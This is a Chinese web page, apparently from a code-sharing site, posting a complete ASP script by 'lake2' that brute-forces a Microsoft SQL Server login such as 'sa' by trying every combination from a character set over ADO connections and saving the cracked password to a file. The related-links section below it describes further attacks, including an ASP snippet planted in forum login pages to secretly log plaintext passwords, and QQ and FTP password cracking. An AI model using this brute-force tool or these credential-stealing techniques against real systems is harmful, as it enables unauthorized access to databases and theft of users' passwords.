用ASP实现MSSQL用户密码破解

自己把以下代码保存为ASP文件。当然我还是一如既往的BS那些只改作者名字的家伙。

代码如下:

<% 
'============ ASP Port Scanner by lake2 =================== 
'http://lake2.0x54.org 
'Version: 0.1 
'For SpringBoard 
'========================================================== 
%> 
<style type="text/css"> 
body,td,th {color: #0000FF;font-family: Verdana, Arial, Helvetica, sans-serif;} 
body {background-color: #ffffff;font-size:14px; } 
a:link {color: #0000FF;text-decoration: none;} 
a:visited {text-decoration: none;color: #0000FF;} 
a:hover {text-decoration: none;color: #FF0000;} 
a:active {text-decoration: none;color: #FF0000;} 
.buttom {color: #FFFFFF; border: 1px solid #084B8E; background-color: #719BC5} 
.TextBox {border: 1px solid #084B8E} 
.styleRed {color: #FF0000} 
</style> 
<title>MSSQL Cracker for SpringBoard</title> 
<% 
Dim Password() 
If Request.Form("go") <> "1" Then 
%> 
 <div align="center">Welcome to <a href="http://lake2.0x54.org" target="_blank">http://lake2.0x54.org</a> </div> 
 <form name="form1" method="post" action="" onSubmit="form1.Submit.disabled=true;"> 
  ConnStr:  
  <input name="conn" type="text" class="TextBox" id="conn" value="Provider=SQLOLEDB.1;Data Source=127.0.0.1;User ID=sa;Password={PASS};" size="70"> 
  <br> 
  Char:      
  <input name="char" type="text" class="TextBox" id="char" value="0123456789" size="30"> 
   <br> 
Length:   
<input name="len" type="text" class="TextBox" id="len" value="3" size="4"> 
<br>  
Path:      
<input name="path" type="text" class="TextBox" value="<%=Server.MapPath("r.txt")%>" size="50"> 
<input name="CFile" type="checkbox" class="TextBox" id="CFile" value="1" checked> 
Enablel<br> 
<input name="go" type="hidden" id="go" value="1"> 
<br> 
<input name="Submit" type="submit" class="buttom" id="Submit" value=" Run "> 
</form> 
<% 
Else 
 timer1 = timer 
 Server.ScriptTimeout = 7776000 
 ConnStr = Request.Form("Conn") 
 Char = request.Form("char") 
 LenChar = Len(Char) 
 ReDim password(LenChar) 
 For i = 1 to LenChar 
  password(i) = Mid(Char, i, 1) 
 Next 
 length = CInt(request.Form("len")) 
 Call LAKE("") 
 response.Write "Done!<br>Process " & tTime & " s" 
 If request.Form("CFile") <> "" Then CreateResult("Done!" & vbcrlf & tTime) 
End If

Sub LAKE(str) 
 If Len(str) >= length Then Exit Sub 
 For j = 1 to LenChar 
  pass = str & password(j) 
  If Len(pass) = length Then Call Crack(pass) 
  Call LAKE(pass) 
 Next 
End Sub

Sub Crack(str) 
 On Error Resume Next 
 Set conn = Server.CreateObject("ADODB.connection") 
 conn.open Replace(ConnStr,"{PASS}",str) 
 If Err Then 
  If Err.Number <> -2147217843 Then 
   response.Write(Err.Description & "<BR>") 
   response.End() 
  End If 
 Else 
  response.Write("I Get it ! Password is <font color=red>" & str & "</font><BR>Process " & tTime & " s") 
  If request.Form("CFile") <> "" Then CreateResult(str & vbcrlf & tTime) 
  response.End() 
 End If 
End Sub

Function tTime() 
 timer2 = timer 
 thetime=cstr(int(timer2-timer1)) 
 tTime = thetime 
End Function

Sub CreateResult(t) 
 Set fs = CreateObject("Scripting.FileSystemObject")  
 Set outfile = fs.CreateTextFile(request.Form("path")) 
 outfile.WriteLine t 
 Set fs = Nothing 
End Sub 
%>

(0)

相关推荐

  • 用ASP实现MSSQL用户密码破解

    自己把以下代码保存为ASP文件.当然我还是一如既往的BS那些只改作者名字的家伙. 复制代码 代码如下: <%  '============ ASP Port Scanner by lake2 ===================  'http://lake2.0x54.org  'Version: 0.1  'For SpringBoard  '==========================================================  %>  <style 

  • 用asp记录论坛用户密码(dvbbs,leadbbs等)

    很多人在得到动网的数据库后郁闷不已 (呀的,管理员的变态密码让我们的机器跑砸了都没辙) Now We Have Another Method!!!!!  这就是用asp记录明文密码. 用法:1.将此代码插入login.asp或admin_login.asp等等验证登陆的文件末尾即可. 2.将PATH换成web下可访问的路径,如:C:\Inetpub\wwwroot\...\Info.txt(info.txt的路径越深越好,防止admin发现) 3.你的webshell必须有权限修改文件且File

  • mssql使用存储过程破解sa密码

    代码演示暴力破解MSSQL的帐号和密码,包括管理员帐号sa的密码. 网上有SQL Server Sa密码破解的存储过程,方法就是暴力破解MSSQL的帐号和密码,包括管理员帐号sa的密码,下面我对其它的代码稍做修改,并进行了一些性能分析. 首先说说破解过程序核心思想,就是存储帐号密码的master.dbo.sysxlogins表和未公布的密码比较存储过程pwdcompare.经过一方分析,修改了部分代码,下面贴出修改前后的代码, 一个SQL Server Sa密码破解的存储过程 复制代码 代码如下

  • Asp中随机产生用户密码的代码

    随机产生用户密码(good),说明:通过随机产生密码,然后将密码EMail给注册用户,你可以确认用户的EMail填写是否正确.  说明:通过随机产生密码,然后将密码EMail给注册用户,你可以确认用户的EMail填写是否正确.自动产生的密码往往安全性更高,同时,你可以过滤那些无效的用户.    把下面的代码保存为random.asp文件:  复制代码 代码如下: <%   Sub StrRandomize(strSeed)   Dim i, nSeed    nSeed = CLng(0)  

  • asp.net利用cookie保存用户密码实现自动登录的方法

    本文实例讲述了asp.net利用cookie保存用户密码实现自动登录的方法.分享给大家供大家参考.具体分析如下: 在asp.net中可以用cookie保存用户的帐户密码实现自动登录的功能,但是需要强调一下,cookie在客户端保存,是不安全的,推荐使用md5加密保存. 下面分析一下在asp.net中cookie的创建.提取与销毁的方法: 创建cookie 复制代码 代码如下: //向客户端写入Cookie HttpCookie hcUserName1 = new HttpCookie("unam

  • 密码破解全教程

    在日常的计算机操作中,我们随时随地都离不开密码--开机要使用CMOS密码.进Windows  98要使用用户密码.编辑Word文档要设置文档密码--,所有这些都为用户的数据安全提供了必要的安全保障!不过随着密码应用范围的增加,遗忘密码的情况也在与日俱增(谁也无法保证自己绝对不会忘记密码)!在忘记密码之后如何破解这些密码,尽可能减少损失就成为广大用户所关注的一个话题.为方便用户的使用,现将常用计算机密码的破解方法向大家作一简要介绍: 一.开机密码  根据用户设置的不同,开机密码一般分为两种不同情况

  • 使用Ruby实现FTP密码破解

    使用Ruby实现FTP密码破解

    这篇文章我将带大家利用Ruby,来构建我们自己的FTP密码破解器.并希望通过这个例子,让大家明白暴力攻击的概念及其重要性.好了话不多说,下面让我们开始吧! 何为暴力攻击? 暴力攻击这个词,其实对于许多安全圈的小伙伴来说都并不陌生,可谓是简单粗暴.但对于许多攻击者而言,暴力攻击却是不可或缺的一种攻击手段.在实际应用中,由于暴力攻击需要消耗大量的时间和资源,因此往往都不会成为攻击者首选的方案,但它却会是攻击者最后的选项. 例如我们设置一个如下场景: 你现在想要访问你所在公司的FTP(文件传输协议)服

  • QQ密码破解与对策全攻略

    QQ密码破解与对策全攻略 一.本地破解  方法:  这个办法的首要条件是你所在的机器开过你想要的QQ号,这又分两种情况,一是你所在的机器真的 曾经开过这个号码,二是通过共享入侵得到你想要的号码的整个目录,把它拷贝到你的OICQ的目录 下,启动OICQ你就能在号码选择下拉列表中看到这个号码了.共享入侵请参看本站黑客教程之 对 共享主机的简单入侵 ,网上硬盘共享最多的就是网吧和公司,而前者的硬盘里存有大量的QQ号码, 只要你能进去且它的OICQ目录或它所在的分区是共享的话,自己慢慢挑吧.但是网上的I

  • 使用mongoose和bcrypt实现用户密码加密的示例

    前面的话 最近在做的个人项目中,需要对密码进行加密保存,对该操作的详细步骤记录如下 介绍 关于mongoose已经写过博客就不再赘述,下面主要介绍bcrypt bcrypt是一个由两个外国人根据Blowfish加密算法所设计的密码散列函数.实现中bcrypt会使用一个加盐的流程以防御彩虹表攻击,同时bcrypt还是适应性函数,它可以借由增加迭代之次数来抵御暴力破解法 使用npm安装即可 npm install --save bcrypt 用户模型 下面来创建代码用户user的schema,用户名

  • Web开发使用Angular实现用户密码强度判别的方法

    Web开发使用Angular实现用户密码强度判别的方法

    Web前端使用Angular实现用户密码强度判别小记 用户密码合法条件: 1.8~16个字符 2.只能包含数字,字母和"_" "."(即不能含有非法特殊字符) 3.数字,字母和"_" "." 至少包含两种 实现过程: 长度检测-注:要区分中文和英文,中文两个字节,英文一个字节,在密码输入的时候是不能输入中文,但在检测用户名的使用,就需要区分中英文 // 获取字符串长度:中文也可正常获取 function GetStrLengt

随机推荐